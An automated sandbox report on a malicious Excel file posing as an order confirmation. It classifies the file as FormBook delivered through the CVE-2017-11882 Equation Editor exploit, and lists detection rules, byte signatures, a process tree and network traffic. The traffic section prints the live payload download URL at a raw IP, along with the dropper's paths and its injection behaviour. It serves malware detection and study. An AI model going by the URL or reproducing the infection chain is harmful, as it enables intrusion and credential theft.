Windows Analysis Report ORDERCONFIRMATION_00001679918.xlsx

Overview

General Information

Sample Name: ORDERCONFIRMATION_00001679918.xlsx
Analysis ID: 491746
MD5: 9c34f5c5e1a78c24947c3fe5fce601ea
SHA1: 727aa4c09c4c4f40d47ba87fa91921876b79f0f3
SHA256: ff1168daa5edebf6c75a6f24573e0b1e8153156b47e9c91712f8aa7968d745db
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2428 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2760 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1612 cmdline: 'C:\Users\Public\vbc.exe' MD5: A9DCC61F31601E771050463C4D41CDB0)
      • vbc.exe (PID: 2248 cmdline: 'C:\Users\Public\vbc.exe' MD5: A9DCC61F31601E771050463C4D41CDB0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000000.466845988.00000000001C0000.00000040.00000001.sdmp | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000004.00000002.469258298.0000000002770000.00000004.00000001.sdmp | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x27408:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x27792:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xa6a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0xa191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0xa7a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0xa91f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x281aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x940c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x28f22:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0xfb77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x10c1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0xcaa9:$sqlite3step: 68 34 1C 7B E1
    • 0xcbbc:$sqlite3step: 68 34 1C 7B E1
    • 0xcad8:$sqlite3text: 68 38 2A 90 C5
    • 0xcbfd:$sqlite3text: 68 38 2A 90 C5
    • 0xcaeb:$sqlite3blob: 68 53 D8 7F 8C
    • 0xcc13:$sqlite3blob: 68 53 D8 7F 8C

    Unpacked PEs

    Source | Rule | Description | Author | Strings
    5.0.vbc.exe.1c0000.1.raw.unpack | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
    • 0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    4.2.vbc.exe.2770000.4.unpack | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
    • 0x4930:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x269e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0xc60:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    4.2.vbc.exe.2770000.4.raw.unpack | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
    • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    5.0.vbc.exe.1c0000.1.unpack | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
    • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    5.2.vbc.exe.1c0000.0.unpack | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
    • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34

    Sigma Overview

    Exploits:

    Sigma detected: EQNEDT32.EXE connecting to internet
    Source: Network Connection, Author: Joe Security, Data: DestinationIp: 23.94.159.204, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2760, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
    Sigma detected: File Dropped By EQNEDT32EXE
    Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2760, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

    System Summary:

    Sigma detected: Droppers Exploiting CVE-2017-11882
    Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2760, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1612
    Sigma detected: Execution from Suspicious Folder
    Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2760, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1612

    Jbx Signature Overview

    AV Detection:

    Multi AV Scanner detection for submitted file
    Source: ORDERCONFIRMATION_00001679918.xlsx, Virustotal: Detection: 30%
    Source: ORDERCONFIRMATION_00001679918.xlsx, ReversingLabs: Detection: 28%
    Yara detected FormBook
    Source: Yara match, File source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY
    Antivirus detection for URL or domain
    Source: http://23.94.159.204/poc/vbc.exe, Avira URL Cloud: Label: malware
    Multi AV Scanner detection for domain / URL
    Source: http://23.94.159.204/poc/vbc.exe, Virustotal: Detection: 11%
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe, Virustotal: Detection: 42%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe, ReversingLabs: Detection: 20%
    Source: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll, Virustotal: Detection: 15%
    Source: C:\Users\Public\vbc.exe, Virustotal: Detection: 42%
    Source: C:\Users\Public\vbc.exe, ReversingLabs: Detection: 20%
    Machine Learning detection for dropped file
    Source: C:\Users\Public\vbc.exe, Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe, Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll, Joe Sandbox ML: detected
    Source: 4.2.vbc.exe.2770000.4.unpack, Avira: Label: W32/Delf.I
    Source: 5.0.vbc.exe.1c0000.1.unpack, Avira: Label: W32/Delf.I
    Source: 5.2.vbc.exe.1c0000.0.unpack, Avira: Label: TR/ATRAPS.Gen

    Exploits:

    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
    Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.465849366.000000000E750000.00000004.00000001.sdmp
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_00405EC2 FindFirstFileA,FindClose,4_2_00405EC2
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_004054EC
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_00402671 FindFirstFileA,4_2_00402671
    Source: C:\Users\Public\vbc.exe, Code function: 5_2_00402671 FindFirstFileA,5_2_00402671
    Source: C:\Users\Public\vbc.exe, Code function: 5_2_00405EC2 FindFirstFileA,FindClose,5_2_00405EC2
    Source: C:\Users\Public\vbc.exe, Code function: 5_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_004054EC
    Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 23.94.159.204:80
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: global traffic, HTTP traffic detected:
      HTTP/1.1 200 OK
      Date: Mon, 27 Sep 2021 19:08:39 GMT
      Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10
      Last-Modified: Mon, 27 Sep 2021 07:27:42 GMT
      ETag: "46591-5ccf50857974b"
      Accept-Ranges: bytes
      Content-Length: 288145
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdownload
    Source: global traffic, HTTP traffic detected:
      GET /poc/vbc.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 23.94.159.204
      Connection: Keep-Alive
    Source: unknown, TCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: vbc.exe, vbc.exe, 00000005.00000000.466883914.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.dr, String found in binary or memory: http://nsis.sf.net/NSIS_Error
    Source: vbc.exe, 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.466883914.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.dr, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: vbc.exe, 00000004.00000002.467563721.0000000001CD0000.00000002.00020000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: vbc.exe, 00000004.00000002.467563721.0000000001CD0000.00000002.00020000.sdmp, String found in binary or memory: http://www.%s.comPA
    Source: F76D3143.emf.0.dr, String found in binary or memory: http://www.day.com/dam/1.0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F76D3143.emf
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00404FF1

    E-Banking Fraud:

    Yara detected FormBook
    Source: Yara match, File source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY

    System Summary:

    Malicious sample detected (through community Yara rule)
    Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    Office equation editor drops PE file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
    Source: 5.0.vbc.exe.1c0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Neshta_Generic, date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 4.2.vbc.exe.2770000.4.unpack, type: UNPACKEDPE, Matched rule: MAL_Neshta_Generic, date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 4.2.vbc.exe.2770000.4.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Neshta_Generic, date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 5.0.vbc.exe.1c0000.1.unpack, type: UNPACKEDPE, Matched rule: MAL_Neshta_Generic, date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 5.2.vbc.exe.1c0000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_Neshta_Generic, date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000005.00000000.466845988.00000000001C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: MAL_Neshta_Generic, date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000004.00000002.469258298.0000000002770000.00000004.00000001.sdmp, type: MEMORY, Matched rule: MAL_Neshta_Generic, date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_0040312A
    Source: C:\Users\Public\vbc.exe, Code function: 5_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_0040312A
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_00406354 4_2_00406354
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_00404802 4_2_00404802
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_00406B2B 4_2_00406B2B
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_73067500 4_2_73067500
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_7306BA78 4_2_7306BA78
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_7306BA87 4_2_7306BA87
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_7306754F 4_2_7306754F
    Source: C:\Users\Public\vbc.exe, Code function: 5_2_00406354 5_2_00406354
    Source: C:\Users\Public\vbc.exe, Code function: 5_2_00404802 5_2_00404802
    Source: C:\Users\Public\vbc.exe, Code function: 5_2_00406B2B 5_2_00406B2B
    Source: C:\Users\Public\vbc.exe, Code function: String function: 00402A29 appears 51 times
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_7306BF13 CreateProcessW,NtQueryInformationProcess,VirtualAllocEx,CreateRemoteThread,SuspendThread,4_2_7306BF13
    Source: C:\Users\Public\vbc.exe, Memory allocated: 76F90000 page execute and read and write
    Source: C:\Users\Public\vbc.exe, Memory allocated: 76E90000 page execute and read and write
    Source: ORDERCONFIRMATION_00001679918.xlsx, Virustotal: Detection: 30%
    Source: ORDERCONFIRMATION_00001679918.xlsx, ReversingLabs: Detection: 28%
    Source: C:\Users\Public\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exe, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Desktop\~$ORDERCONFIRMATION_00001679918.xlsx
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRE2EE.tmp
    Source: classification engine, Classification label: mal100.troj.expl.evad.winXLSX@6/16@0/1
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_00402053 CoCreateInstance,MultiByteToWideChar,4_2_00402053
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
    Source: C:\Users\Public\vbc.exe, Code function: 4_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_004042C1
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File read: C:\Windows\System32\drivers\etc\hosts
    Source: Window Recorder, Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.465849366.000000000E750000.00000004.00000001.sdmp
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
    Source: C:\Users\Public\vbc.exe, File created: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll

    Boot Survival:

    Drops PE files to the user root directory
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2956 | Thread sleep time: -300000s >= -30000s
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405EC2 FindFirstFileA,FindClose
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402671 FindFirstFileA
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402671 FindFirstFileA
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_00405EC2 FindFirstFileA,FindClose
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
    Source: vbc.exe, 00000004.00000002.467502213.00000000004D4000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_7306B472 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_7306B737 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_7306B776 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_7306B7B4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_7306B686 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Process queried: DebugPort

    HIPS / PFW / Operating System Protection Evasion:

    Injects a PE file into a foreign processes
    Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 1C0000 value starts with: 4D5A
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: vbc.exe, 00000005.00000002.673362938.0000000000900000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000005.00000002.673362938.0000000000900000.00000002.00020000.sdmp | Binary or memory string: !Progman
    Source: vbc.exe, 00000005.00000002.673362938.0000000000900000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
